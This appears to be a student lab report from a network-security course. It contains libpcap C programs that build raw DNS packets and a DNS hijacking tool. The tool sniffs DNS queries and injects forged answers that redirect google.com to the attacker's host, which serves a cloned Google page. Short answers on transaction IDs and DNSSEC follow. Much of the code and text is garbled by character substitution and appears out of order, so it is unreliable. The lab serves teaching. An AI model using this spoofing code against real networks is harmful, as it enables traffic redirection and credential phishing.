} unsigned short udp_csum (unsigned short len,unsigned short ip_src[],unsigned short ip_dst[],unsigned short buff[]) { unsigned short udp_protocol ! .+/_/)0,; unsigned short padding ! 9; unsigned long sum; int i; // 8ind out if the length of data is e5en or odd number. $f odd, add a padding byte Q 9 at the end of packet i% (len17 '! 9){ padding !!; buff[len]!9; } // $nitialiFe sum to Fero sum ! 9; // #um all the buffer in !( bit words %or(i!9;i-(len"padding)/7;i"") sum"!ntohs((unsigned short) buff[i]); // #um the pseudo header which contains source ip, destination ip, protocol number and length %or(i!9;i-7;i"") sum"!ntohs((unsigned short) ip_src[i]); %or(i!9;i-7;i"") sum"!ntohs((unsigned short) ip_dst[i]); sum"! (unsigned short)udp_protocol " (unsigned short)len; whi#e (sum$$!() sum ! (sum ( 9 8888) " (sum $$!(); return 0sum; } int main(int argc,char arg5[]) { u_char packet[J999]; char de5; // network de5ice char errb[/1*/_E))G.8_#$%E]; pcap_t descr; // session description bpf_u_intH7 net; // ip of de5ice bpf_u_intH7 mask; // subnet mask int i,result,siFe_ip; u_char host; print_app_info(); i%(argc'!H){ printf(B.sageI Ks <-etwork +e5iceDs -ame> <'ostname e Iwww.5ne press.net> CnB,arg5[9]); e it(!); }e#se{ de5!arg5[!]; host!arg5[7]; } // cheking for suitable network de5ice and store the ip,subnet mask for future use i%(pcap_lookupnet(de5,(net,(mask,errb) !! &!){ printf(BErrorI KsCnB,errb); e it(!); } // set the pcap description descr ! pcap_open_li5e(de5,G.8#$%,!,9,errb); i% (descr !! )*++){ printf(B#et description failedI KsCnB, errb); e it(!); } // Fero out the packet memset(packet,9,"9O(); /*
????????????????????? &ao mot goi tin L+-# )EP.E#&M ???????????????????????? Ethernet 'eader N $/ 'eader N .+/ 'eader N +-# 'eader N Puery -ame N +ns Puery */ struct struct struct struct struct ethernet_header eth; ip_header ip; udp_header udp; dns_header dns; dns_3uery dns_3r; dns_as; // // // // // pointer pointer pointer pointer pointer chi chi chi chi chi toi toi toi toi toi 5ung 5ung 5ung 5ung 5ung dau dau dau dau dau cua cua cua cua cua ethernet header ip header udp header dns header dns 3uery
u_char 3_name; struct dns_answer
// +ns name in 3uery // pointer chi toi 5ung dau cua dns answer // 'ostname length // kich thuoc cua 3uery name 5a dns 3uery header =7>
int host_len!strlen(host); int siFe_3_name!host_len"7;
/* ????????????????? &ao pointer chi toi 5ung nho tuong ung trong packet ???????????????? */ eth ! (struct ethernet_header )(packet); /****************************&0 GE ;0+$8$E+ ! ***************************/ ip ! (struct ip_header )(packet " #$%E_E&'); /****************************&0 GE ;0+$8$E+ 7 ***************************/ udp ! (struct udp_header )(packet " #$%E_E&' " si,eo%(struct ip_header)); /****************************&0 GE ;0+$8$E+ H ***************************/ dns ! (struct dns_header )(packet " #$%E_E&' " si,eo%(struct ip_header) " si,eo%(struct udp_header)); // Puery name /ointer 3_name !(u_char ) (packet " #$%E_E&' " si,eo%(struct ip_header) " si,eo%(struct udp_header) " si,eo%(struct dns_header)); // +ns Puery /ointer dns_3r !(struct dns_3uery ) (packet " #$%E_E&' " si,eo%(struct ip_header) " si,eo%(struct udp_header) " si,eo%(struct dns_header)"siFe_3_name); // +ns *nswer /ointer dns_as!(struct dns_answer ) (packet " #$%E_E&' " si,eo%(struct ip_header) " si,eo%(struct udp_header) " si,eo%(struct dns_header)"siFe_3_name"si,eo%(struct dns_3uery)); /* Ethernet 'eader */ bcopy(BC G!C G7C GHC G"C GJC G(B,(eth&$ether_shost,(); // #ource ;*1 *ddress /****************************&0 GE ;0+$8$E+ " ***************************/ bcopy(BC *!C *7C *HC *"C *JC *(B,(eth&$ether_dhost,(); // +estination ;*1 *ddress bcopy(BC 9:C 99B,(char )(eth&$ether_type,7); // &ype $/ =9 9:99> /* $/ 'eader */ ip&$ip_5hl ! 9 "J; ip&$ip_tos ! 9 99; ip&$ip_id ! htons(9 f!a"); ip&$ip_off ! 9; ip&$ip_ttl ! ("; ip&$ip_p ! .+/_/)0,; ip&$ip_sum ! 9;
// $/ 5ersion " @ length Q J words =79 bytes> // +ifferentiated #er5ices 8ield // $dentification // time to li5e // .+/ protocol // ip checksum =44>
(ip&$ip_src).s_addr ! inet_addr(B(.2.:.OB); // source ip address /****************************&0 GE ;0+$8$E+ J ***************************/ (ip&$ip_dst).s_addr ! inet_addr(B!.7.H."B);; // destination ip address /* .+/ 'eader */ udp&$udp_sport ! htons(JH); // source port /****************************&0 GE ;0+$8$E+ ( ***************************/ udp&$udp_dport ! htons("999); // destination port udp&$udp_sum ! 9; // udp checksum =44> /* +-# 'eader */ dns&$id!htons(9 **GG); dns&$flags!htons(9 :!:9); dns&$3_count!htons(9 99!); dns&$ans_count!htons(9 99!); dns&$auth_count!9; dns&$add_count!9; // // // // // // transaction $+ flags =standard 3uery> number of 3uestion number of answer number of authority number of resource
/* +-# PueryI 3uery_name, dns 3uery header, dns 3uery answer */ // 1on5ert hostname to dns format and store in memory where 3_name point to +-#_name_con5erter(host,3_name); dns_3r&$3_type!htons(!); // type of the host dns_3r&$3_class!htons(!); // class /* +-# *nswer */
bcopy(BC c9C 9cB,(dns_as&$a_name,7); dns_as&$a_type!htons(!); dns_as&$a_class!htons(!); bcopy(BC 99C 99C 9!C cHB,(dns_as&$a_ttl,"); dns_as&$a_len!htons(");
// type of the host // class
/****************************&0 GE ;0+$8$E+ 2 ***************************/ dns_as&$a_addr.s_addr ! inet_addr(B!!!.(J.7":.!H7B); /* .pdate ,ength $p 'eader and .dp 'eader */ udp&$udp_len! htons(si,eo%(struct udp_header) " si,eo%(struct dns_header)"siFe_3_name"si,eo%(struct dns_3uery)"si,eo%(struct dns_answer)); ip&$ip_len ! htons(si,eo%(struct ip_header)) " udp&$udp_len; // total length siFe_ip ! $/_',(ip) "; /* ./+*&E 1'E1<#.; 08 $/ 'E*+E) *-+ .+/ 'E*+E) */ ip&$ip_sum!9; ip&$ip_sum! (csum ((unsigned short ) (packet"#$%E_E&') ,siFe_ip)); udp&$udp_sum!9; udp&$udp_sum! htons(udp_csum(ntohs(udp&$udp_len), (u_short )((ip&$ip_src) , (u_short )((ip& $ip_dst), (unsigned short )udp)); /* send packet ( times */ %or (i!9; i -! J; i"") { result ! pcap_sendpacket (descr,packet,#$%E_E&'"ntohs(ip&$ip_len)); i%(result !! 9) printf(BL/acket sent sucessfullyMCnB); e#se printf(BL/acket sent failureMCnB); } } return 9;
@esult with capturing packet% A @ecei e ; dns response packets
Part II: DNS attack
Normal scenario: )ereafter are the steps for the user on )ost% to connect to an ,e-site. e/g/ 0"AIL • On )ost%. user enters ,,,/gmail/com to the -ro,ser • )ost% as1s host2 for the ip address of ,,,/gmail/com • )ost2 returns the ip address of ,,,/google/com 3ipgoogle4 to host% • host% connects 3ipgoogle4 Attack scenario • User enters ,,,/gmail/com to the -ro,ser/ • )ost5 sniffs the traffic on the ,ire and tries to do !NS session hi6ac1ing -7 racing against the host2/ In fact. it tries to pro8ide a fa1e ans,er to host % 3)ost 5 returns its ip address 3ip54 instead of the actual ip address of gmail3ipgoogle4 to host %4 • )ost% recei8e the fa1e ans,er from host 5 and connects to host5 3ip54 in -elie8ing that it is tal1ing to ,,,/google/com Task 1: Create a program running on host5. called dnsattac1/c. in ,hich. it • captures the net,or1 traffic and filter out the dns pac1et 3get the code from La-59part%4 • creates the fa1e response pac1et ,ith the information mentioned a-o8e 3get code from La-59 part%4 • sends the fa1e pac1et to host% To help 7ou in creating the program. I sent 7ou the e:ample of dnsattac1/c program/ You need to add the appreciate code at different palces ,here I ha8e mar1ed ;TO <E "O!I=IE!>/
Answer% Dntai_dns_attack_v1.c
#include #include #include #include #include #include #include
<string.h> //strlen <stdlib.h> //malloc <sys/socket.h> //you know what this is for <arpa/inet.h> //inet_addr , inet_ntoa , ntohs etc <netinet/in.h> <unistd.h> //getpid <pcap.h>
/* Ethernet headers are always e actly !" bytes */
#define #$%E_E&' !" /* default snap length =ma imum bytes per packet to capture> */ #define #-*/_,E- !J!: /* Ethernet addresses are ( bytes */ #define E&'E)_*++)_,E- ( /* .+/ /)0&010, */ #define .+/_/)0, !2 struct dns_answer { u_short a_name; u_short a_type; u_short a_class; u_char a_ttl["]; u_short a_len; struct in_addr a_addr; }; struct dns_3uery { u_short 3_type; u_short 3_class; }; /* /* /* /* /* /* answer host name */ answer host type */ answer host class */ time to li5e cost " bytes */ length */ address of host */
/* type of the host */ /* class */
struct ethernet_header { u_char ether_dhost[E&'E)_*++)_,E-]; u_char ether_shost[E&'E)_*++)_,E-]; u_short ether_type; }; /* $/ header */ struct ip_header { u_char ip_5hl; u_char ip_tos; u_short ip_len; u_short ip_id; u_short ip_off; #define $/_)8 9 :999 #define $/_+8 9 "999 #define $/_;8 9 7999 #define $/_088;*#< 9 !fff u_char ip_ttl; u_char ip_p; u_short ip_sum; struct in_addr ip_src,ip_dst; }; #define $/_',=ip> #define $/_A=ip> struct udp_header { u_short udp_sport; u_short udp_dport; u_short udp_len; u_short udp_sum; }; /* /* /* /*
/* destination host address */ /* source host address */ /* $/4 *)/4 )*)/4 etc */
/* /* /* /* /* /* /* /* /* /* /* /*
5ersion << " 6 header length >> 7 */ type of ser5ice */ total length */ identification */ fragment offset field */ reser5ed fragment flag */ dont fragment flag */ more fragments flag */ mask for fragmenting bits */ time to li5e */ protocol */ checksum */
===ip>?>ip_5hl> @ 9 9f> ===ip>?>ip_5hl> >> "> source port */ destination port */ udp length */ udp checksum */
struct dns_header { u_short id; /* transaction $+ */ u_short flags; /* flags */ u_short 3_count; /* number of 3uestion entries */ u_short ans_count; /* number of answer entries */ u_short auth_count; /* number of authority entries */ u_short add_count; /* number of resource entries */ }; pcap_t handle; /* packet capture handle */
/* functions */ 5oid print_app_info(5oid); unsigned short csum (unsigned short buf, int nwords); unsigned short udp_csum (unsigned short len,unsigned short ip_src[],unsigned short ip_dst[],unsigned short buff[]); unsigned short csum (unsigned short { unsigned long sum!9; int i; buf, int nwords)
%or (i!9; i-(nwords/7); i"") sum "! buf[i]; sum ! (sum $$ !() " (sum ( 9 ffff); sum "! (sum $$ !(); } return 0sum;
unsigned short udp_csum (unsigned short len,unsigned short ip_src[],unsigned short ip_dst[],unsigned short buff[]) { unsigned short udp_protocol ! .+/_/)0,; unsigned short padding ! 9; unsigned long sum; int i; // 8ind out if the length of data is e5en or odd number. $f odd, add a padding byte Q 9 at the end of packet i% (len17 '! 9){ padding !!; buff[len]!9; } // $nitialiFe sum to Fero sum ! 9; // #um all the buffer in !( bit words %or(i!9;i-(len"padding)/7;i"") sum"!ntohs((unsigned short) buff[i]); // #um the pseudo header which contains source ip, destination ip, protocol number and length %or(i!9;i-7;i"") sum"!ntohs((unsigned short) ip_src[i]); %or(i!9;i-7;i"") sum"!ntohs((unsigned short) ip_dst[i]); sum"! (unsigned short)udp_protocol " (unsigned short)len; whi#e (sum$$!() sum ! (sum ( 9 8888) " (sum $$!(); } char return 0sum; dns_name_re5ert(char 3_name, char int count, len, first, i; count ! 9; len ! 9; first ! 3_name[count]; count""; whi#e(first$9){ %or(i!9;i-first;i""){ host[len] ! 3_name[count]; len""; count""; } first ! 3_name[count]; count ""; i%(first$9) { host[len] ! D.D; len""; } } host[len] ! 9; return host; host){
} 5oid got_packet(u_char args, const struct pcap_pkthdr header, const u_char { static int count ! !; /* packet counter */ /* declare pointers to packet headers */ struct ethernet_header ethernet; /* &he ethernet header L!M */ struct ip_header ip; /* &he $/ header */ struct udp_header udp; struct dns_header dns; struct dns_3uery dns_3r; struct dns_answer dns_as; int siFe_ip; int siFe_tcp; packet)
int siFe_payload; u_char new_packet[J999]; memset(new_packet,9,J999); //copy the content of captured packet to the new buffer ip ! (struct ip_header )(packet " #$%E_E&'); bcopy(packet,new_packet,ntohs(ip&$ip_len)"#$%E_E&'); /****************8)0; -0E 0- EE E0)< 0- &'E -EE G.88E)**************************/ /* define ethernet header */ ethernet ! (struct ethernet_header )(new_packet); //'E)E $ #E$&1' &'E ;*1 #0.)1E char mac[(]; /* print source and destination $/ addresses */ printf(B#witch the souce and destination ;*1 addressesCnB); printf(B=Gefore> 8romI KsCnB, ether_ntoa(ethernet&$ether_shost)); printf(B=Gefore> &oI KsCnB, ether_ntoa(ethernet&$ether_dhost)); //&0 GE ;0+$8$E+ !I bcopy(ethernet&$ether_shost,mac,(); bcopy(ethernet&$ether_dhost,ethernet&$ether_shost,(); bcopy(mac,ethernet&$ether_dhost,(); printf(B=*fter> printf(B=*fter> 8romI KsCnB, ether_ntoa(ethernet&$ether_shost)); &oI KsCnB, ether_ntoa(ethernet&$ether_dhost));
/* define/compute ip header offset */ ip ! (struct ip_header )(new_packet " #$%E_E&'); siFe_ip ! $/_',(ip) "; i% (siFe_ip - 79) { printf(B * $n5alid $/ header lengthI Ku bytesCnB, siFe_ip); return; } /* print source and destination $/ addresses */ printf(B#witch the souce and destination $/ addressesCnB); printf(B=Gefore> 8romI KsCnB, inet_ntoa(ip&$ip_src)); printf(B=Gefore> &oI KsCnB, inet_ntoa(ip&$ip_dst)); //&0 GE ;0+$8$E+ 7I your code to swap the $/ addresses struct in_addr ip_addr_tmp; ip_addr_tmp ! ip&$ip_src; ip&$ip_src ! ip&$ip_dst; ip&$ip_dst ! ip_addr_tmp; printf(B=*fter> printf(B=*fter> 8romI KsCnB, inet_ntoa(ip&$ip_src)); &oI KsCnB, inet_ntoa(ip&$ip_dst));
printf(B#witch the souce and destination portsCnB); udp!(struct udp_header )(new_packet " siFe_ip "#$%E_E&'); printf(B=Gefore> udp source portI Kd CnB,ntohs(udp&$udp_sport)); printf(B=Gefore> udp destination portI Kd CnB,ntohs(udp&$udp_dport)); //&0 GE ;0+$8$E+ HI your code to swap the udp ports u_short port_tmp; port_tmp ! udp&$udp_sport; udp&$udp_sport ! udp&$udp_dport; udp&$udp_dport ! port_tmp; printf(B=*fter> udp source portI Kd CnB,ntohs(udp&$udp_sport)); printf(B=*fter> udp destination portI Kd CnB,ntohs(udp&$udp_dport)); u_char 3_name; int siFe_3_name; // +ns name in 3uery
dns ! (struct dns_header )(new_packet " #$%E_E&' " si,eo%(struct ip_header) " si,eo%(struct udp_header)); // Puery nameR 3_name !(u_char )(new_packet " #$%E_E&' " si,eo%(struct ip_header) " si,eo%(struct udp_header) " si,eo%(struct dns_header)); siFe_3_name!strlen(3_name)"!;
dns_3r !(struct dns_3uery )(new_packet " #$%E_E&' " si,eo%(struct ip_header) " si,eo%(struct udp_header) " si,eo%(struct dns_header)"siFe_3_name); dns_as !(struct dns_answer )(new_packet " #$%E_E&' " si,eo%(struct ip_header) " si,eo%(struct udp_header) " si,eo%(struct dns_header)"siFe_3_name " si,eo%(struct dns_3uery)); /*???????????????????????10-#&).1& +-# 'E*+E)???????????????????*/ dns&$flags!htons(9 :!:9); // flags =standard 3uery and answer> dns&$3_count!htons(9 99!); // number of 3uestion dns&$ans_count!htons(!); // number of answer dns&$auth_count!9; // number of authority dns&$add_count!9; // number of resource /* ???????????????????10-#&).1& +-# *-#EE)?????????????????????*/ bcopy(BC c9C 9cB,(dns_as&$a_name,7); dns_as&$a_type!htons(!); // type of the host dns_as&$a_class!htons(!); // class bcopy(BC 99C 99C 9JC dbB,(dns_as&$a_ttl,"); dns_as&$a_len!htons("); // &0 GE ;0+$8$E+ "I change the ip address as re3uired dns_as&$a_addr.s_addr!inet_addr(args); /*???????????????????1'E1< #.; *-+ ,E-S&'???????????????????????*/ udp&$udp_len! htons(si,eo%(struct udp_header) " si,eo%(struct dns_header)"siFe_3_name"si,eo%(struct dns_3uery)"si,eo%(struct dns_answer)); ip&$ip_len ! htons(si,eo%(struct ip_header) " ntohs(udp&$udp_len)); // total length siFe_ip ! $/_',(ip) "; ip&$ip_sum!9; ip&$ip_sum! (csum ((unsigned short ) (new_packet"#$%E_E&') ,siFe_ip)); udp&$udp_sum!9; udp&$udp_sum! htons(udp_csum(ntohs(udp&$udp_len), (u_short )((ip&$ip_src) , (u_short )((ip& $ip_dst), (unsigned short )udp)); int result; char host[J999]; dns_name_re5ert(3_name,host); printf(B,ookup domain nameI KsCnB,host ); i%(strstr(host,Bgoogle.comB)'!)*++) { result ! pcap_sendpacket (handle,new_packet,#$%E_E&'"ntohs(ip&$ip_len)); i%(result !! 9) printf(BL/acket sent sucessfullyMCnB); e#se printf(BL/acket sent failureMCnB); } e#se { printf(BL/acket doesnDt sentMCnB); } } return;
/* httpI//www.binarytides.com/c?program?to?get?ip?address?from?interface?name?on?linu / */ #include <net/if.h> #include <sys/ioctl.h> char get_ip_address(char iface, char buf) { struct ifre3 ifr; int fd ! socket(*8_$-E&, #01<_+S)*;, 9); // type of address to retrie5e ? $/5" $/ address ifr.ifr_addr.sa_family ! *8_$-E&; //1opy the interface name in the ifre3 structure strncpy(ifr.ifr_name , iface , $8-*;#$%&!); ioctl(fd, #$01S$8*++), (ifr); close(fd); // result strcpy(buf, inet_ntoa(((struct sockaddr_in return buf; } )(ifr.ifr_addr )&$sin_addr));
int main(int argc,char arg5[]) { char de5 ! )*++; char errbuf[/1*/_E))G.8_#$%E]; char ip_current_address[79];
/* capture de5ice name */ /* error buffer */ /* /* /* /* /* filter e pression LHM */ compiled filter program =e pression> */ subnet mask */ ip */ number of packets to capture */
char filter_e p[] ! Budp dst port JHB; struct bpf_program fp; bpf_u_intH7 mask; bpf_u_intH7 net; int num_packets ! 9;
/* check for capture de5ice name on command?line */ i% (argc !! 7) { de5 ! arg5[!]; } e#se i% (argc $ 7) { fprintf(stderr, BerrorI unrecogniFed command?line optionsCnCnB); //print_app_usage=>R e it(ET$&_8*$,.)E); } e#se { /* find a capture de5ice if not specified on command?line */ de5 ! pcap_lookupde5(errbuf); i% (de5 !! )*++) { fprintf(stderr, B1ouldnDt find default de5iceI KsCnB, errbuf); e it(ET$&_8*$,.)E); } } /* get network number and mask associated with capture de5ice */ i% (pcap_lookupnet(de5, (net, (mask, errbuf) !! &!) { fprintf(stderr, B1ouldnDt get netmask for de5ice KsI KsCnB, de5, errbuf); net ! 9; mask ! 9; } /* print capture info */ printf(B+e5iceI KsCnB, de5); printf(B-umber of packetsI KdCnB, num_packets); printf(B8ilter e pressionI KsCnB, filter_e p); get_ip_address(de5,ip_current_address); printf(B1urrent $/ *ddressI KsCnB, ip_current_address); /* open capture de5ice */ handle ! pcap_open_li5e(de5, #-*/_,E-, !, !999, errbuf); i% (handle !! )*++) { fprintf(stderr, B1ouldnDt open de5ice KsI KsCnB, de5, errbuf); e it(ET$&_8*$,.)E); } /* make sure weDre capturing on an Ethernet de5ice L7M */ i% (pcap_datalink(handle) '! +,&_E-!9;G) { fprintf(stderr, BKs is not an EthernetCnB, de5); e it(ET$&_8*$,.)E); } /* compile the filter e pression */ i% (pcap_compile(handle, (fp, filter_e p, 9, net) !! &!) { fprintf(stderr, B1ouldnDt parse filter KsI KsCnB, filter_e p, pcap_geterr(handle)); e it(ET$&_8*$,.)E); } /* apply the compiled filter */ i% (pcap_setfilter(handle, (fp) !! &!) { fprintf(stderr, B1ouldnDt install filter KsI KsCnB, filter_e p, pcap_geterr(handle)); e it(ET$&_8*$,.)E); } /* now we can set our callback function */ pcap_loop(handle, num_packets, got_packet, (u_char )ip_current_address);
/* cleanup */ pcap_freecode((fp); pcap_close(handle); printf(BCn1apture complete.CnB); return 9; }
E plain: ! "o#i$ie# co#e 1:
//'E)E $ #E$&1' &'E ;*1 #0.)1E char mac[(]; /* print source and destination $/ addresses */ printf(B#witch the souce and destination ;*1 addressesCnB); printf(B=Gefore> 8romI KsCnB, ether_ntoa(ethernet&$ether_shost)); printf(B=Gefore> &oI KsCnB, ether_ntoa(ethernet&$ether_dhost)); //&0 GE ;0+$8$E+ !I bcopy(ethernet&$ether_shost,mac,(); bcopy(ethernet&$ether_dhost,ethernet&$ether_shost,(); bcopy(mac,ethernet&$ether_dhost,(); printf(B=*fter> printf(B=*fter> 8romI KsCnB, ether_ntoa(ethernet&$ether_shost)); &oI KsCnB, ether_ntoa(ethernet&$ether_dhost));
! "o#i$ie# co#e 2:
//&0 GE ;0+$8$E+ 7I your code to swap the $/ addresses struct in_addr ip_addr_tmp; ip_addr_tmp ! ip&$ip_src; ip&$ip_src ! ip&$ip_dst; ip&$ip_dst ! ip_addr_tmp;
! "o#i$ie# co#e %:
//&0 GE ;0+$8$E+ HI your code to swap the udp ports u_short port_tmp; port_tmp ! udp&$udp_sport; udp&$udp_sport ! udp&$udp_dport; udp&$udp_dport ! port_tmp;
! "o#i$ie# co#e &:
/* httpI//www.binarytides.com/c?program?to?get?ip?address?from?interface?name?on?linu / */ #include <net/if.h> #include <sys/ioctl.h> char get_ip_address(char iface, char buf) { struct ifre3 ifr; int fd ! socket(*8_$-E&, #01<_+S)*;, 9); // type of address to retrie5e ? $/5" $/ address ifr.ifr_addr.sa_family ! *8_$-E&; //1opy the interface name in the ifre3 structure strncpy(ifr.ifr_name , iface , $8-*;#$%&!); ioctl(fd, #$01S$8*++), (ifr); close(fd); // result strcpy(buf, inet_ntoa(((struct sockaddr_in return buf; )(ifr.ifr_addr )&$sin_addr));
} U 5oid got_packet(u_char args, const struct pcap_pkthdr header, const u_char { U // &0 GE ;0+$8$E+ "I change the ip address as re3uired dns_as&$a_addr.s_addr!inet_addr(args); 2 } U int main(int argc,char arg5[]) { 2 char ip_current_address[79]; 2 get_ip_address(de5,ip_current_address); printf(B1urrent $/ *ddressI KsCnB, ip_current_address); 2 /* now we can set our callback function */
packet)
pcap_loop(handle, num_packets, got_packet, (u_char )ip_current_address); V U char 2
! "o#i$ie# co#e E tra:
dns_name_re5ert(char 3_name, char int count, len, first, i; count ! 9; len ! 9; first ! 3_name[count]; count""; whi#e(first$9){ %or(i!9;i-first;i""){ host[len] ! 3_name[count]; len""; count""; } first ! 3_name[count]; count ""; i%(first$9) { host[len] ! D.D; len""; } } host[len] ! 9; return host; host){
} U 5oid got_packet(u_char args, const struct pcap_pkthdr { 2 char host[J999]; dns_name_re5ert(3_name,host); printf(B,ookup domain nameI KsCnB,host ); i%(strstr(host,Bgoogle.comB)'!)*++) {
header, const u_char
packet)
result ! pcap_sendpacket (handle,new_packet,#$%E_E&'"ntohs(ip&$ip_len)); i%(result !! 9) printf(BL/acket sent sucessfullyMCnB); e#se printf(BL/acket sent failureMCnB); } e#se { printf(BL/acket doesnDt sentMCnB); } 2 V
Task 2: Install a ,e-ser8er on host5. create a home page to ma1e it loo1 li1e ,,,/gmail/com Ans'er: (n )ost2
& & & & & sudo apt&3et insta## apache. sudo service apache. start cd /var/www/ sudo su root w3et 3oo3#e.com 45 inde6.htm#
Task %: Test and ma1e sure 7our attac1 ,or1s 9 On host5. run sudo /?dntai_dns_attack
- On host%. run terminal.
• • T7pe nslookup google.com 3attac1ers redirects dns of google4 T7pe nslookup vnexpress.net
•
Open =irefo:. t7pe in address google*com
•
Screen on )ost %
Question 1: Compare the dns request and dns response with respect to a) Source MAC address and Destination MAC address b) P source, P destination c) source port, destination port Ans'er • !ns Re@uest 8s !ns Reponse a-out "ac Address !equest
!esponse
• !ns Re@uest 8s !ns Reponse a-out Ip Address !equest
!esponse
• !ns Re@uest 8s !ns Reponse a-out Aort !equest
!esponse
• Result dns re@uest and response s,ap each other a-out mac address. ip address. and port -et,een source and destination/ Question 2" #hat is the ro$e o% &ransaction D %ie$d o% the DNS packet' Ans'er Transaction I! is a %&9-it field identif7ing a specific !NS transaction/ The transaction I! is created -7 the message originator and is copied -7 the responder into its response message/ Using the transaction I!. the !NS client can match responses to its re@uests/ Question 3: (ind a so$ution to pre)ent dns session hi*ackin+ attack Answer: A solution to prevent dns session hijacking attack is !""#$: The !omain Name S7stem Securit7 E:tensions 3!NSSEC4 is a suite ofInternet Engineering Tas1 =orce 3IET=4 specifications for securing certain 1inds of information pro8ided -7 the !omain Name S7stem 3!NS4 as used on Internet Arotocol 3IA4 net,or1s/ It is a set of e:tensions to !NS ,hich pro8ide to !NS clients 3resol8ers4 origin authentication of !NS data. authenticated denial of e:istence. and data integrit7. -ut not a8aila-ilit7 or confidentialit7/ 3Bi1i4
!!! +,t !!!
24/09/2013
Duration: 180 minutes
Student name '( N)* T+I
Student I! "IT"#$#%&
Introduction
To do the DNS Hijacking attack, you need to know how to generate, capture the packets programmatically. Understand the udp, dns packet headers as well as the dns protocol The purpose of this lab is to gi e you hands!on e"perience on low le el network programming. #ore precisely, you are going to create the dns re$uest and response. These will help you a lot for the ne"t lab %&. 'n general, to generate the raw packet you can use pcap library (http%))www.tcpdump.org)pcap.html&. *ibnet library http%))packetfactory.openwall.net)projects)libnet)dist)deprecated)manual)lrm.html or e en the standard +,' http%))en.wikipedia.org)wiki)-erkeley.sockets 'n the conte"t of this lab, we use pcap library for our purpose. Se eral useful information can be found at http%))www.tcpdump.org)pcap.html To help you to ha e an idea how the dns packet look like, on your linux machine • open wireshark to capture the traffic • open a terminal and e"ecute /nslookup ne"press.net0 Try to look at the different fields of the captured dns!packet and understand what they are used for. This link http%))www.networksorcery.com)enp)protocol)dns.htm is also a great source for this purpose.
Part I: DNS packet generation
To help you on the programming stuff, ' ha e created two programs, called dns_request_gen.c and dns_response_gen.c. The programs ' sent to you are not complete. 1ou need to modify them at se eral places ( ' ha e marked as /T2 -3 #2D'4'3D0&. I. DNS packet request #odify dns_request_gen.c to generate the dns re$uest that ha e the • source #+5% +6 +7 +8 +9 +: +; • destination #+5% -6 -7 -8 -9 -: -; • source port% 9<<< • destination port% :8 • Transaction 'D% ++-• source ', address%6.7.8.9 • destination ', address% ;.=.>.? • dns $uerry to ask the ', address of / ne"press.net0
Answer% Dntai_dns_request_v1.c (without ip, udp checksum )
#include <string.h> //strlen #include <stdlib.h> //malloc #include <sys/socket.h> //you know what this is for #include <arpa/inet.h> //inet_addr , inet_ntoa , ntohs etc #include <netinet/in.h> #include <unistd.h> //getpid #include <pcap.h> /* Ethernet headers are always e actly !" bytes */ #define #$%E_E&' !" /* Ethernet addresses are ( bytes */ #define E&'E)_*++)_,E- ( /* .+/ /)0&010, */ #define .+/_/)0, !2 struct dns_3uery { u_short 3_type; u_short 3_class; }; /* type of the host */ /* class */
struct ethernet_header { u_char ether_dhost[E&'E)_*++)_,E-]; u_char ether_shost[E&'E)_*++)_,E-]; u_short ether_type; }; /* $/ header */ struct ip_header { u_char ip_5hl; u_char ip_tos; u_short ip_len; u_short ip_id; u_short ip_off; #define $/_)8 9 :999 #define $/_+8 9 "999 #define $/_;8 9 7999 #define $/_088;*#< 9 !fff u_char ip_ttl; u_char ip_p; u_short ip_sum; struct in_addr ip_src,ip_dst; }; #define $/_',=ip> #define $/_A=ip> struct udp_header { u_short udp_sport; u_short udp_dport; u_short udp_len; u_short udp_sum; }; /* /* /* /*
/* destination host address */ /* source host address */ /* $/4 *)/4 )*)/4 etc */
/* /* /* /* /* /* /* /* /* /* /* /*
5ersion << " 6 header length >> 7 */ type of ser5ice */ total length */ identification */ fragment offset field */ reser5ed fragment flag */ dont fragment flag */ more fragments flag */ mask for fragmenting bits */ time to li5e */ protocol */ checksum */
===ip>?>ip_5hl> @ 9 9f> ===ip>?>ip_5hl> >> "> source port */ destination port */ udp length */ udp checksum */
struct dns_header { u_short id; /* transaction $+ */ u_short flags; /* flags */ u_short 3_count; /* number of 3uestion entries */ u_short ans_count; /* number of answer entries */ u_short auth_count; /* number of authority entries */ u_short add_count; /* number of resource entries */ }; /* functions */ 5oid print_app_info(5oid){ printf(B+ns re3uest 5ersion ! writen by +o -hu &aiCnB); } 5oid +-#_name_con5erter(char host,char dns); 5oid +-#_name_con5erter(char host,char dns) { int len!strlen(host); dns[len"7]!9;
int count!9; // 8or counting number of charaters from begin until meet a DdotD whi#e(len$9){ // Ehile host name length is larger than or e3ual to Fero i%(host[len&!]!!D.D) // 1ount from last character of host name if there is a DdotD { dns[len]!count; // #tore counted number into the dns name buffer count!9; // #et count to Fero for recount }e#se{ dns[len]!host[len&!]; // $f character is not a DdotD store it into the dns name buffer count""; } // $ncrease count len&&; // +ecrease len } dns[9]!count; // Ehen get to the last character // #tore the final counter into the dns name buffer
}
int main(int argc,char {
arg5[])
char errb[/1*/_E))G.8_#$%E]; pcap_t descr; // session description bpf_u_intH7 net; // ip of de5ice bpf_u_intH7 mask; // subnet mask int i,result,siFe_ip; u_char host; // host name to look up ip. E I 5ne press.net char de5; // network de5ice to capture. E I eth9 u_char packet[J999]; // packet is buffer to contain data print_app_info(); i%(argc'!H){ printf(B.sageI Ks <-etwork +e5iceDs -ame> <'ostname e Iwww.5ne press.net> CnB,arg5[9]); e it(!); }e#se{ de5!arg5[!]; host!arg5[7]; } // cheking for suitable network de5ice and store the ip,subnet mask for future use i%(pcap_lookupnet(de5,(net,(mask,errb) !! &!){ printf(BErrorI KsCnB,errb); e it(!); } // set the pcap description descr ! pcap_open_li5e(de5,G.8#$%,!,9,errb); i% (descr !! )*++){ printf(B#et description failedI KsCnB, errb); e it(!); } // Fero out the packet =LEthernetM N L$/M N L&1//.+/M N L*pplicationM> memset(packet,9,"9O();// packet la mang de chua du lieu bat duoc /* ????????????????????? &ao mot goi tin L+-# )EP.E#&M ???????????????????????? Ethernet 'eader N $/ 'eader N .+/ 'eader N +-# 'eader N Puery -ame N +ns Puery */ struct struct struct struct ethernet_header eth; ip_header ip; udp_header udp; dns_header dns; // // // // pointer pointer pointer pointer chi chi chi chi toi toi toi toi 5ung 5ung 5ung 5ung dau dau dau dau cua cua cua cua ethernet header ip header udp header dns header
u_char 3_name; int host_len!strlen(host); =5ne press.net co lenQ!H> struct dns_3uery dns_3r; int siFe_3_name!host_len"7;
// pointer chi toi 5ung dau chua 3uery_name // do dai cua 3uery name chinh la so ky tu cua host name // pointer chi toi 5ung dau cua dns 3uery // kich thuoc cua 3uery name 5a dns 3uery header =7>
